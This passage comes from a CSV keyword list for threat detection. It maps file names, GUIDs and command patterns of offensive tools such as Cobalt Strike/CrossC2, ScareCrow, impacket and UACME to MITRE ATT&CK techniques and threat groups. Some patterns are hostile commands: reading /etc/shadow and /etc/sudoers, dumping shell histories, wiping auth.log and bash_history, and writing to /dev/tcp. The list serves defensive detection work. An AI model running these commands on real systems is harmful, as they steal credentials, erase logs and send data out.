T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" +"*capturetokenphish.py*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" +"*CarbonCopy*","offensive_tool_keyword","CarbonCopy","A tool which creates a spoofed certificate of any online website and signs an Executable for AV Evasion. Works for both Windows and Linux","T1606 - T1553 - T1105 - T1027 - T1562","TA0002 - TA0008 - TA0011","N/A","N/A","Exploitation tools","https://github.com/paranoidninja/CarbonCopy","1","0","N/A","N/A","10","1185","276","2020-10-03T03:23:20Z","2018-11-14T04:48:10Z" +"*CarbonCopy.py*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*cardano2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*careCrow*_linux_amd64*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*cargo install glit*","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","34","6","2022-11-28T20:42:23Z","2022-11-14T11:25:10Z" +"*carlospolop/PurplePanda*","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/carlospolop/PurplePanda","1","1","N/A","N/A","6","569","80","2023-08-07T04:13:59Z","2022-01-01T12:10:40Z" +"*cat *.atftp_history*","greyware_tool_keyword","cat","Enumerating user files history for interesting information","T1083 - T1005","TA0007","N/A","N/A","Reconnaissance","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*cat *.atftp_history*","greyware_tool_keyword","cat","show atftp history","T1552.002 - T1070.004","TA0005 - TA0009","N/A","N/A","discovery","N/A","1","0","N/A","2","9","N/A","N/A","N/A","N/A" +"*cat *.bash_history*","greyware_tool_keyword","cat","Enumerating user files history for interesting information","T1083 - T1005","TA0007","N/A","N/A","Reconnaissance","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*cat *.bash_history*","greyware_tool_keyword","cat","show bash history","T1552.002 - T1070.004","TA0005 - TA0009","N/A","N/A","discovery","N/A","1","0","N/A","2","9","N/A","N/A","N/A","N/A" +"*cat *.bin | base64 -w 0 > *.txt*","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","0","N/A","10","10","980","241","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z" +"*cat *.mysql_history*","greyware_tool_keyword","cat","Enumerating user files history for interesting information","T1083 - T1005","TA0007","N/A","N/A","Reconnaissance","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*cat *.mysql_history*","greyware_tool_keyword","cat","show mysql history","T1552.002 - T1070.004","TA0005 - TA0009","N/A","N/A","discovery","N/A","1","0","N/A","2","9","N/A","N/A","N/A","N/A" +"*cat *.nano_history*","greyware_tool_keyword","cat","Enumerating user files history for interesting information","T1083 - T1005","TA0007","N/A","N/A","Reconnaissance","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*cat *.nano_history*","greyware_tool_keyword","cat","show nano history","T1552.002 - T1070.004","TA0005 - TA0009","N/A","N/A","discovery","N/A","1","0","N/A","2","9","N/A","N/A","N/A","N/A" +"*cat *.ntds","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*cat *.php_history*","greyware_tool_keyword","cat","Enumerating user files history for interesting information","T1083 - T1005","TA0007","N/A","N/A","Reconnaissance","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*cat *.php_history*","greyware_tool_keyword","cat","show php history","T1552.002 - T1070.004","TA0005 - TA0009","N/A","N/A","discovery","N/A","1","0","N/A","2","9","N/A","N/A","N/A","N/A" +"*cat *.zsh_history*","greyware_tool_keyword","cat","show zsh history","T1552.002 - T1070.004","TA0005 - TA0009","N/A","N/A","discovery","N/A","1","0","N/A","2","9","N/A","N/A","N/A","N/A" +"*cat *.zsh_history*","greyware_tool_keyword","cat","Enumerating user files history for interesting information","T1083 - T1005","TA0007","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*cat *bash-history*","greyware_tool_keyword","cat","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access - Defense Evasion - Exfiltration","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*cat ./apache-tomcat-8.5.77/webapps/ROOT/tomcatwar.jsp","offensive_tool_keyword","spring-core-rce","CVE-2022-22965 : about spring core rce","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Mr-xn/spring-core-rce","1","0","N/A","N/A","1","54","18","2022-04-01T15:34:03Z","2022-03-30T14:35:00Z" +"*cat /dev/null > *bash_history*","greyware_tool_keyword","bash","Clear command history in linux which is used for defense evasion. ","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1146/T1146.yaml","1","0","greyware tool - risks of False positive !","N/A","10","8147","2532","2023-10-03T21:23:41Z","2017-10-11T17:23:32Z" +"*cat /dev/null > /var/log/auth.log*","greyware_tool_keyword","cat","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*cat /dev/null > ~/.bash_history*","greyware_tool_keyword","cat","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*cat /etc/passwd*","greyware_tool_keyword","cat","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access - Defense Evasion - Exfiltration","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*cat /etc/shadow*","greyware_tool_keyword","cat","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access - Defense Evasion - Exfiltration","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*cat /etc/sudoers*","greyware_tool_keyword","cat","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access - Defense Evasion - Exfiltration","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*cat > /dev/tcp/127.0.0.1*<*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*catphish.rb*","offensive_tool_keyword","catphish","Generate similar-looking domains for phishing attacks. Check expired domains and their categorized domain status to evade proxy categorization. Whitelisted domains are perfect for your C2 servers. Perfect for Red Team engagements.","T1565 - T1566 - T1567 - T1596","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/ring0lab/catphish","1","1","N/A","N/A","6","583","131","2018-10-16T12:57:25Z","2016-10-24T22:48:51Z" +"*cb1bf87f2976eb49c5560b16a69c742b39706c48314bcc0bdeeaf545910bd380*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*CB561720-0175-49D9-A114-FE3489C53661*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","1","62","19","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" +"*CC127443-2519-4E04-8865-A6887658CDE5*","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","6","1","61","5","2023-07-23T03:10:44Z","2023-07-10T11:57:44Z" +"*cc2_keystrokes*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*cc2_keystrokes_*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*cc2_mimipenguin.*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" +"*cc2_portscan*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*cc2_portscan_*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*cc2_rebind_*_get_recv*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*cc2_rebind_*_get_send*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*cc2_rebind_*_post_recv*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*cc2_rebind_*_post_send*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*cc2_udp_server*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*cc2FilesColor.*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" +"*cc2ProcessColor.*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 